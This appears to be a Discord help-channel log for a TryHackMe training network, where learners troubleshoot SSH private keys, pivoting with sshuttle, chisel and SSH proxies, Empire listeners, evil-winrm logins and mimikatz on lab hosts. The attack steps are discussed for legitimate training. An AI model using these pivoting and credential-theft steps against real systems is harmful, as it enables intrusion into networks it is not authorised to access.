Well, that doesn't seem to work as well, tried different chisel versions, different ports as well as a different client with a bare metal install of kali linux still the same problem after the login prompt, it just dies on me while pretending to load /resources, even deleted my firewall rule and added it anew.

wind sonnet
#

πŸ™‡

tropic heath
#

this room is not working for me =/

#

Muiri

#

I just finished your room

#

very nice

#

uploadvulns

#

thanks

#

ok I cant do anything in this room, how can I reset it?

#

.<

dry pendant
#

for wreath, you share it with other users, so you have to vote for a reset (at the top of the page). Once there are enough votes, it will be reset to a clean state

tropic heath
#

MUIR

#

this is your doing too, omg!

#

you are gooood ❀️

tropic heath
#

ok

#

i f'ed up

#

i tried to connect with an ssh key with bad permissions and got myself banned

#

is there anything i can do?

merry robin
#

There isn't anything in place to ban you πŸ™‚

tropic heath
#

muiri

#

thanks

#

but... why isnt it working then?

#

i got the key

#

ssh -i key root@IP

#

Permission denied (publickey,gssapi-keyex,gssapi-with-mi

merry robin
#

Sounds like a formatting error -- or someone messed with the key

#

I don't have my Kali active to check

tropic heath
#

Look, this was my mistake

#

did the same stupidity with the private key

merry robin
#

Well, chmod 600 it

tropic heath
#

it doesnt lemme in even after that T_T

open nebula
zinc furnace
surreal sail
kindred nacelle
# merry robin That all sounds correct. Very strange

Thanks again for the support Muiri, I don't know why and how, but after 2 days banging my head against the wall it just works like a charm. Didn't change a single thing πŸ€” πŸ˜… kudos and thanks for the great room, really appreciated πŸ‘

winter lintelBOT
#

Gave +1 Rep to @merry robin

tropic heath
#

I could not make work the ssh keys for me

#

=(

zinc furnace
#

@tropic heath do chmod 600 to the keysfirst

#

Then try

robust cloak
#

How do I install modules for python2 on my kali vm? I'm trying to run the exploit that was shown in task 19, and I get the following error

Traceback (most recent call last):
  File "exploit-An00bRektn.py", line 17, in <module>
    import requests
ImportError: No module named requests
#

I'm not sure how to specify the version. The man pages tell me to use pip instead of pip3, but both are defaulting to requests in python3

#

nvm just saw the pinned messages, I think I can figure it out on my own

worn zenith
#

Yeah even for me with the bot copied keys it says the same did chmod 600 to all the files

robust cloak
#

did you copy the public key to your machine? You're supposed to use the private key to connect.

worn zenith
#

I copy all of them

#

pub to pub, private to private since the private key gave the same error

#

After that removed every ssh file from my kali generated them again deleted the copied key called it root_key chmod 600 still "root@10.200.90.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)."

jagged lion
#

@worn zenith you sure you have the root pub key?

surreal sail
#

Hey guys I'm on Empire section of wreath network, im having some problems in getting a agent in task gitserver! These are my ss

surreal sail
surreal sail
surreal sail
#

If anyone is able to help me pls see to it!

stoic flicker
#

you're listening on 6000 yet it's pinging back on 7000

#

doesn't look like it's grabbing the right listener

humble warren
#

I think someone patched the webserver...

worn zenith
surreal sail
#

hey, i am getting this error

#

I dont know what I am doing wrong

kindred nacelle
#

If you want to use ip you need β€” prior if you want to use - you need i

#

You mixed it up

#

Try the evilwinrm help for additional info

stoic flicker
#

yeah it's -i not -ip

surreal sail
#

thank you

surreal sail
stoic flicker
#

yeah but something's pinging back on 7000

#

probably the wrong agent?

surreal sail
stoic flicker
#

there's nothing listening on 7000 on that server

surreal sail
#

What do u mean??

stoic flicker
#

your php server is listening on 6000

surreal sail
#

Yes

stoic flicker
#

why is it looking for stuff on 7000?

surreal sail
#

Where is it saying that that it js looking for 7000?

stoic flicker
#

you may have misconfigured the listener

surreal sail
#

Ohhk

#

So I'll have to kill the listeners

stoic flicker
#

check your conf for the hop listener

surreal sail
#

Ok πŸ‘

#

Thanks mate for the help

stoic flicker
#

gl

#

all else fails, nuke everything and try again πŸ™‚

surreal sail
kindred nacelle
wild wadi
#

Why doesnt id_rsa work when copied with CTRL+C && CTRL+V

#

md5sum shows different numbers,also

#

it just isnt the same file

#

any ideas?

kindred nacelle
#

If I understood you correctly, you try to mark a terminal line and ctrl+c it?

#

you cant CTRL+C && CTRL+V

wild wadi
#

No, im copying the id_rsa from the server, pasting it into my own machine and it doesnt work

kindred nacelle
#

How are you copying it?

#

and how are you pasting

wild wadi
#

ctrl shift c ctrl shift v

kindred nacelle
#

and from where (shell, rdp) ?

wild wadi
#

this is the error

#

shell

kindred nacelle
#

yes thats what I thought

#

the link I shared tells you this

#

try it out with copy some marked line in the shell and ctr + v it into an editor of your choosing

#

see what you get

#

you need to CTRL+SHIFT+C

wild wadi
#

this is what i ve been doing, man

kindred nacelle
#

and CTRL+SHIFT+V

#

and after that chmod the file with 600

wild wadi
#

my guess is that the file isn't copied correctly even if it is the same

wild wadi
stoic flicker
#

there may be newline issues

#

either one too many or one missing at the end

kindred nacelle
stoic flicker
#

check that line endings are LF and not CRLF, as well

kindred nacelle
#

chmod is set?

wild wadi
#

yes

wild wadi
#

is there a way to just transfer the file?

#

i tried scp, simplehttpserver, simple.http, curl, everything

kindred nacelle
#

hrmm I would simply remove the file and copy it anew check to make sure that you dont get any random chars or empty lines from copying

kindred nacelle
#

e.g.

wild wadi
#

i am done for today with this room i will try again tomorrow if it doesnt work i will quit it

#

a ctrl c defeats me

civic bloom
#

For task 21, I created the user and confirmed that the user is in admin and remote management users group. But when I tried to connect from my attacking machine to the .150 host via evil-winrm and xfreerdp, both seems to be failing. The error shows connection timeout

#

Anyone can help? Can I not connect directly from my attacker machine to the .150 host?

stoic flicker
#

nope

#

you'll have to proxy through the web server

civic bloom
#

Mind if I DM you?

stoic flicker
#

not terribly available atm,

#

sorry

civic bloom
#

Aight, np

stoic flicker
#

you can post here though

civic bloom
#

Oh I can? Thought I shouldn't lol

stoic flicker
#

this is the help channel for wreath πŸ™‚

civic bloom
#

you'll have to proxy through the web server
So I setup my proxy using ssh -D 1337 root@10.200.93.200 -fN -i id_rsa

#

Then attempt to evil-winrm into .150 host using evil-winrm -u user -p pass -i 10.200.93.150

#

Still not working hmm

stoic flicker
#

try sshuttle or chisel

#

you may need to pop a hole in the firewall

#

and you'll need to setup proxychains if you use chisel

#

read the course material, it'll help you get started πŸ™‚

#

notably the section on pivoting

outer elm
#

oops

#

seems like im no longer able to access the prod-serv (first machine) after i tried to socat

silver hare
#

Hello!
I'm stuck at the pivoting part to server3.
I open the port in firewall

#

Open chisel as server running the open port

#

And after that open chisel as client in my kali machine on the port 9090

#

Configure the foxyproxy(proxy 127.0.0.1:9090), and it's not working ...

#

I don't know what I'm doing wrong

#

Solved ^^

silver hare
#

Also: How can I be connected to vpn and also use google? This drive me crazy that I have to switch over and over again between kali and windows ...

#

I saw that AttackBox doesn't have this problem

#

Most probably it's a setting or someting

strange bison
silver hare
#

I'm using openvpn cli but it's the same like kali VPN client

#

The problem persist in both ways ...

strange bison
#

It shouldn't.
Check the routing table, make sure there aren't bad routes being added.

silver hare
#

Hmm, let me see

#

Routes are the same like in AttackBox...
But what I've said, there i can access machines and also use google, or other sites in the same time.
In my machine with vpn active, I can access only machines, that's all

strange bison
#

If you drop into #site-support, that would be a more appropriate place to ask

silver hare
#

Thank you so much! I will

frail jasper
#

hey guys... so it is not only me, right ? i can't access the machine with openvpn

pallid vapor
#

use the wreath vpn

frail jasper
#

no, i was using it

#

regenerating it solved the issue

#

thanks

civic bloom
winter lintelBOT
#

Gave +1 Rep to @stoic flicker

solar mist
#

I'm trying Task 29, but when I execute it in powershell the stager returns powershell.exe : Invoke-Expression : Cannot bind argument to parameter 'Command' because it is an empty string.
and when I try to execute it through burpsuite with the RCE exploit it wont work either

#

does anyone know a fix / what I'm doing wrong?

#

I put the php files etc on the prod-server and I made a php listening port there

stoic flicker
#

you used the stager generated by empire and not the one on the task, yes?

solar mist
#

yeah

#

I generated it in empire with http-hop as listener

stoic flicker
#

might be some quotes shenanigans in the RCE then?

solar mist
#

well atleast not in the exploit / stager, as the exploit works fine but I don't know how to test the stager

#

guess I'll just fire up a local windows VM to test it

gilded grove
#

hey! just started doing wreath again and got until the part with the hop listener. Thats when my network time expired and now I cant connect to any host in the network anymore. Pinging any machine doesnt get any response and ssh doesnt work as well. Already regenerated my VPN pack, rebooted kali and voted for reset but so far nothing. Is there anyone who can help?

golden spoke
#

Guy's Hello!
Trying to continue WREATH, but i can't connect to prod-serv (.200) and to git-serv (.150). Already connected to the Wreath VPN
Could you help me with it?

#

sshuttle
ssh: connect to host 10.200.94.200 port 22: No route to host
c : fatal: c : failed to establish ssh session (2)

gilded grove
#

@golden spoke Seems that Im on the same subnet as you, I also cant connect

#

Would be nice if someone could reset the network

#

@merry robin @oblique crag Could you guys please help us out?

golden spoke
#

Sorry guys @stoic flicker @strange bison but maybe you can help us with that problem please?

strange bison
#

Please don't ping the admins for that @gilded grove

gilded grove
#

Nice support, very helpful

stoic flicker
strange bison
stoic flicker
#

I'd say check that you aren't on another VPN

#

otherwise vote for a reset, don't think I can help beyond that, sorry

golden spoke
stoic flicker
#

I'm just a user like you are, no special access

golden spoke
#

Reset (3/8) need 5 more votes

golden spoke
winter lintelBOT
#

Gave +1 Rep to @stoic flicker

stoic flicker
#

Not sure how sshuttle works, but maybe check that you have the right key configured?

golden spoke
#
  • It works well now. Network was restarted
#

@gilded grove try to use

winter lintelBOT
#

Gave +1 Rep to @stoic flicker

stoic flicker
surreal sail
#

guys this shows an error while executing listener on empire

#

this is the info of the listener

strange bison
#

There's already a listener with that name, it looks like.

silver jewel
#

Does anyone know if there is an issue with the private key coz im having issues ?

strange bison
#

There can be, if someone changed it

silver jewel
#

I thought so to but the box was reset and i tried it again still same issue

steady swan
#

@silver jewel, what's the issue?

#

I mean the error...

silver jewel
#

I basically keep getting an error when trying to ssh into the webserver with the private key... apparently the key is invalid..i forgot the exact error message

#

@steady swan

steady swan
#

Hmm

#

How can I help without knowing the error?

#

Did you do chmod 600 id_rsa?

#

And one more thing, did you get id_rsa or id_rsa.pub?

#

@silver jewel

#

Anyways. Ping me when you come back

silver jewel
#

I got id_rsa.....and yes i changed permissions @steady swan

steady swan
#

So what's the error?

#

You remember atleast a word?

#

Of the error?

#

@silver jewel

#

Do you go away every 30 seconds and come back after 30 minutes? Lol

silver jewel
#

Sorry about that..i am spinning up my kali box @steady swan

steady swan
#

I see

#

Ping me when you come back

#

I might be able to help you as I completed Wreath about 4 days ago

silver jewel
#

So the error is load key "id-rsa" invalid format....im not sure how exactly its invalid since i also confirmed with darks video and they are practically the same @steady swan

steady swan
#

Just retry downloading it

#

Or try renaming it

silver jewel
#

I tried...about five times still got nothing @steady swan

steady swan
#

Hmm

#

Reset the machine?

#

Maybe?

silver jewel
#

When i tried it the machine was just reset at that time @steady swan

steady swan
#

Which machines key are you getting?

#

I mean the hostname?

#

First of all. Tell me how you downloaded it?

#

Using?

silver jewel
#

I copy pasted it

steady swan
#

How? I mean the command?

#

Cat?

#

Or nano?

silver jewel
#

Cat

steady swan
#

Hmm I see

steady swan
#

You are attacking .200 right?

silver jewel
#

Naah..the webserver

steady swan
#

Bro. Seriously?

#

You have to get root SSH keys for the prod server thing

#

Not the git server

silver jewel
#

Yeah..i got it at /root/.ssh

steady swan
#

Machine name?

#

Git serv or prod serv?

silver jewel
#

Prod

steady swan
#

You just told me git server

silver jewel
#

Ooh..sorry..

steady swan
#

Hmm

#

How did you get in?

#

Webmin RCE?

silver jewel
#

Webminrce then revshell

steady swan
#

Do you have a stable shell?

silver jewel
#

Yeah

steady swan
#

Can you send a screenshot?

silver jewel
#

Cool..lemme dm you the pic then

steady swan
#

Sure

pallid vapor
#

@silver jewel you might need to convert the key if you have a different openssh version

silver jewel
#

How exactly does a different openssh version affect it? @pallid vapor

dry pendant
#

if you're getting invalid id_rsa key format, make sure it has a blank line at the end of the file, and no blank lines or spaces at the start.

pallid vapor
#

i believe they might have changed the format

#

i had that issue once

strange bison
#

It should be backwards compatible

pallid vapor
#

Β―_(ツ)_/Β―

#

my issue is i had a too new openssh i think?

strange bison
#

Yeah, but should be backwards compatible.

pallid vapor
#

Β―_(ツ)_/Β―

#

i dony know it was a while ago

stoic flicker
#

I had that issue as well, and then I recopied the key and it was fine. you can probably set up an http server that can upload files on your attacking machine and curl it over

#

check the line endings, and that there's a newline at the end

silver jewel
#

I fixed the issue

#

You just have to download the key instead of copy pasting it

strange bison
#

You can copy paste it, but ok

silver jewel
#

I tried copy pasting but didn't work for me

stoic flicker
#

It's finicky

real shuttle
#

@real shuttle

pallid vapor
#

ok then

#

πŸ‘€

surreal sail
#

anyone having issues with the network?

#

nvm got it

next lark
#

I'm in task 6, is it just me or is the id_rsa empty? pretty sure it's not supposed to be

strange bison
#

Shouldn't be, someone might have been a terrible person

next lark
#

could be why there's 3 votes for a reset

next lark
#

That was 13 hours ago, the network reset

dry pendant
#

There are many different instances of the wreath network, so not everyone is on the same subnet. A reset for one won't affect the others.

next lark
winter lintelBOT
#

Gave +1 Rep to @dry pendant

dry pendant
#

The third octet in the IP is which network you are on. There's usually something like 10 or so people that share that network with you

next lark
#

Oh, I thought it'd be a lot more for some reason

dry pendant
#

I could be wrong. I think it says somewhere on the page

#

the number of votes needed to reset is related to the number of current users. Not sure if it's the same number or not

next lark
#

Didn't see anything about that, but I must admit I was too excited to get on with it

dry pendant
#

Wreath is the only network I've done, but it's definitely one of (if not THE) best rooms I've done

next lark
#

It does seem like a lot of fun and very educational

lyric bane
#

Hey @merry robin, just curious when do you plan to update task 4 to include the links to the reports?

acoustic oracle
#

Is there any problem with the machine?

#

.200

#

is not reachable for some reason

burnt pike
#

I do not see the option to start/extend/reset was anything changed on that side?

acoustic oracle
#

@burnt pike

burnt pike
acoustic oracle
#

did you try in another browser?

burnt pike
#

have not, ill try

#

ah same issue

#

brave/firefox

#

on kali

surreal sail
#

hello

#

i am getting this error in sshuttle

#

while trying to do this

robust cloak
surreal sail
#

which command are you reffering to

robust cloak
#

sshuttle

surreal sail
#

sshuttle -r root@ip --ssh-cmd "ssh -i private_key" ip

#

-x for exclude a certain ip

robust cloak
#

Try and exclude the ip that you use in the root@ip

surreal sail
#

okay lets see

robust cloak
#

Also that β€œip” you put at the end should be a subnet, not just the ip

surreal sail
#

at first it worked with only the ip let me see if i have a screenshot for that

undone umbra
#

Hi, I lost my connection with my reverse shell in the task 6, and now I can't made the exploit run again....
Failed to connecto http://....

#

what should i do?

#

Since I cant restart the network just for me

#

Fixed!

#

It's up running again πŸ™‚

surreal sail
cosmic turtle
#

Hey ! Can anyone help me with this funny issue I am having :

waxen orbit
#

Have you joined Wreath network?

cosmic turtle
#

Yes I have joined the room

#

I am on a 34 day streak even

#

I actually downloaded the VPN file once before

#

But at one point my OS crashed

waxen orbit
#

Try leaving Wreath room and joining again.

cosmic turtle
#

Okay

#

Thanks Man. It worked !

vestal kelp
#

Is anyone else having issues connecting to the final machine? I'm literally following the walkthrough verbatim and not getting a connection. Specifically Task 21 -- not able to make a connection but my tunnel is working.

indigo beacon
#

I can connect

#

But the mimikatz part seems corrupted

vestal kelp
#

Hmm. Frustrating because I’ve used Evil-WinRM many times without issues but acting up here. Perhaps I’ll just wait for a reset next year πŸ‘»

#

Thanks for validating. I could regen a VPN key too I suppose.

#

Fantastic room FWIW. Probably the best I’ve seen on THM.

indigo beacon
#

Anyone else get this error?

vestal kelp
#

@indigo beacon also not allowing me to make the connection

#

I just jumped over to Attacktive Directory to make sure I'm not doing something wrong and Evil-WinRM works fine.

indigo beacon
#

If everything is fine then winrm or rdp should not be acting up

#

Try creating another user?

vestal kelp
#

Already did, same issue :/

#

And I'm able to get a reverse shell as intended from that final machine to the .200 machine.

#

I guess I can try uploading a nc.exe binary and get a shell that way?

#

Probably will get flagged though.

indigo beacon
vestal kelp
#

Yeah, I guess spoilers aren't an issue since it's a walkthrough room. I got the PowerShell reverse shell on .200 using the GitStack exploit. Created the user as instructed with proper permissions, and when I try to RDP or use winrm just stalls out

#

May be a dumb question, but the IP we are connecting to is the Windows machine's IP, no? For WinRM and RDP.

indigo beacon
#

Yeah, windows

vestal kelp
#

Okay, couldn't see any other way. May just have to wait for a reset.

indigo beacon
#

Are you using sshuttle?

vestal kelp
#

Yeeep

indigo beacon
#

Welp gotta wait for the reset πŸ₯²

vestal kelp
#

haha yeah, thanks for the support regardless

viral igloo
#

i cant ping machine

#

even scan

#

but dns work and i can see the page

#

why?

viral igloo
#

any help?

jagged lion
#

it probably doesnt respond to ICMP

merry robin
#

(It should respond to ICMP)

viral igloo
#

i can see the webpage the redirect to a domain after to add to host file

#

but i can not scan it

sweet valve
#

Hi everyone, I am on task 18 for Git Server: Pivoting. I am trying to complete the first task of using sshuttle to get into the network. I was able to RCE into the machine and grab the id_rsa of root.

But when I run the command sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.200.81.0/24 -x 10.200.81.200 I am getting "Permission denied" .

I also tested by using sudo ssh 10.200.81.200 -i id_rsa and I am getting the same result.

I already did chmod 600 id_rsa to set the id_rsa file to be read/write.

Let me know if what you guys think I should do. Kinda stuck on this for last 2 days.

waxen orbit
#

Does it say invalid key or something? If yes then try adding 1 or 2 new empty lines at the end of id_rsa key. Also, verify your account so you can send screenshots here.

sweet valve
#

Thanks I'll try that in a bit and let you know. Thank you

indigo beacon
#

Anyone able to help with this error? Task 21, gives error instead of the expected output

hard mortar
#

@indigo beacon when you spawned cmd, make sure you ran it as administrator

#

if you run it in a low integrity level (ex. a normal user who has local admin perms, but doesn't have the admin permissions invoked), mimikatz will fail

#

simple fix, right click cmd, run as admin

indigo beacon
#

Omg thank you

#

I completely forgot about that πŸ€¦β€β™‚οΈ

hard mortar
leaden oyster
#

i have joined the wreath network room but when i go to vpn access page to download the pack it says you dont have access to any network

#

what can be the issue?

waxen orbit
#

Try leaving Wreath room and joining again.

leaden oyster
#

how to leave a room?

abstract grove
leaden oyster
#

Ok thanks

river phoenix
#

hello im new here. hope im welcome

dry pendant
#

Everyone is welcome πŸ™‚

#

If you're new to THM, I recommend #start-here . Also, verifying with the bot is helpful. See the link below:

#

!docs verify

thin crescentBOT
strange ibex
#

Performing Task 18: Pivoting in the room

Getting the following error, even though port 22 is open on the mentioned IP:

sshuttle -r root@10.200.105.150 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24 -x 10.200.105.150
ssh: connect to host 10.200.105.150 port 22: No route to host
c : fatal: c : failed to establish ssh session (2)

#

Any idea why this is occuring?

indigo beacon
#

@strange ibex That's the wrong ip

#

Also the subnet

strange ibex
#

@indigo beacon every user doesn't get the same IP and subnet, if I'm not wrong

strange bison
#

Lat octet should be the same for the machines though

strange ibex
#

error fixed, it occured bcoz the network was resetting -.-

shut elm
#

Hii

strange ibex
#

hey @shut elm

indigo beacon
dry pendant
south ocean
#

Does anyone else run into issues downloading the Website.git directory? Everytime I try to do it my VM freezes up and then it errors out with "Error Download failed..." and also an authorization error for evil-winrm.

south ocean
#

NVM I just said screw it and zip'd the original folder to my user desktop and downloaded from there

indigo beacon
strange bison
#

You do not share a network with the hundreds or thousands of other users in Wreath at the moment, just a small number.

indigo beacon
#

Ohh okay, was confused a bit there

#

@strange bison Thanks for clearing the air

winter lintelBOT
#

Gave +1 Rep to @strange bison

strange bison
#

Generally, community mentors and mods are more familiar with how stuff works behind the scenes. I think Wreath specifically states how many people share a network at the start?

indigo beacon
dry pendant
#

The only indicator I saw is in the vote count for reset. I don't know if that's the exact number of people in the room, or a percentage, or what

#

But yeah, I think it's roughly 10 people per instance, at least from what I saw when I did wreath. I could be way off.

merry robin
#

It's currently set to either 35 or 40 per network. Can't remember which

#

Might even have been dropped to 25

dry pendant
#

my suspicions were correct, then :). I guessed it was a percentage

quaint saddle
#

Its showing connected to the wreath network still not getting any ping response, need help

maiden lichen
quaint saddle
#

Network resetted, no ping results

#

anyone having the same problem?

maiden lichen
#

For me, it just doesn't respond to ICMP...

maiden lichen
#

nvm it does

quaint saddle
#

i am not able to find any solution

#

but there is one thing very weird , that there are many tun ips like tun0,tun1,tun2,...etc

strange bison
#

Well there's your problem

#

!multivpn

thin crescentBOT
#
TryHackMe
Learn how to look for duplicate instance of your OpenVPN connection.
β€’ Step 1

Make sure you have setup your VPN connection correctly https://tryhackme.com/room/openvpn

β€’ Step 2

Type ps aux | grep openvpn into your terminal and press enter

β€’ Step 3

If there's more than one line (that don't start with "grep" or sudo), do the following steps

β€’ Step 4

Type sudo killall openvpn into your terminal and press enter

β€’ Step 5

Start the VPN with sudo openvpn <path-to-config>

quaint saddle
#

okk thanks

#

@strange bison

#

after killing all

#

then again i did ps aux | grep open vpn

#

still it shows the same number of processes

#

I am trying manually

#

worked

lone delta
#

Unable to create new listtener on starkiller

quaint saddle
#

facing this issue while installing empire

sacred linden
#

Hello,

There is a problem with wreath room, because i can't to run the exploit
and i tested with the arg --force, i have the shell but i can't run the commands except "exit", so i tested to "concat" multiple commands but not result 😦
Can you help me please ?
If someone answer me, can you ping me please. Thanks

merry robin
#

--force doesn't mean you have a shell, @sacred linden -- it just means that it skipped the bit where it checked if it was possible to get a shell and jumped to trying (and failing) to execute commands.

#

Can you access the website?

sacred linden
merry robin
#

Can you access port 10000?

#

-unmute @sacred linden Accidental raid protection trigger

winter lintelBOT
#

πŸ”Š Unmuted Shydoow#4449

sacred linden
#

thanks

merry robin
#

Np

#

If you can access port 10,000 then the exploit should work. What's it giving you?

#

(You can screenshot now, but verify properly when you can)

sacred linden
#

sorry, i executed the exploit on this port and it's failed.

merry robin
#

Are you sure you're in the 72 subnet?

#

Not least because that network is not active

sacred linden
#

I'm in the vm THM

merry robin
#

Screenshot the network map at the top of the room

sacred linden
#

i follow the video when i saw that doesn't work

#

And i can ping this ip : 10.200.54.200, so i don't understand πŸ€”

merry robin
#

You're attacking the wrong IP in your screenshot

#

Target 10.200.54.200, not 10.200.72.200 @sacred linden

sacred linden
winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

Np :)

sacred linden
#

actually it works much better haha

quaint saddle
#

I am facing problem in starting starkiller

jagged lion
# quaint saddle

Did you start empire? Looking at your screenshot above your Starkiller command is a failed empire command. Looking at the error it’s probably a python version issue

quaint saddle
#

i also tried with sudo python empire

#

still not working

quaint saddle
#

Is anyone facing the same issue?

#

also .200 site is not opening

#

vpn is on and connected

surreal sail
quaint saddle
#

yes its working fine

#

also i tried regenerating ovpn

#

it worked

south ocean
#

Anyone else having SSH issues on 10.200.82.x?

quaint saddle
#

nopes

#

it worked fine

#

check other things whether they are working fine or not

ebon tapir
#

I am facing problem in listening windows using brupsuit

#

Host name windows
Host ip 10.200.51.150

sweet valve
#

Hey guys, I am trying to ssh into wreath but I am having issues. I used the RCE exploit from muirland to get into the .200 server and copied the /root/.ssh/id_rsa file from the server to my attacking machine. Then did chmod 600 id_rsa to make sure the file could be used.

But when I run "sudo ssh -i id_rsa root@10.200.81.200" I am still getting this message:
root@10.200.81.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

I looked at previous messages on this chat. But can't find the solution. I also looked at a walkthrough online on YouTube and know I am doing the right steps.

Is there something I'm missing? I also voted to restart the machine. Not sure if that will resolve it.

#

I also deleted any spacing or new lines at the end of the ssh private key file with nano

crimson nest
#

Which user did u chmod 600 with?

#

I think you should run ssh as that user because only that user can read the id_rsa file u copied over

#

Yeah only the user that you created the id_rsa file with can read said file so run ssh as that user

#

@sweet valve

sweet valve
#

got it will try again

waxen orbit
#

Also, add 1 or 2 new line at the end of id_rsa and try again.

ebon tapir
#

Hello

#

i need help in task 20 last question of the task.....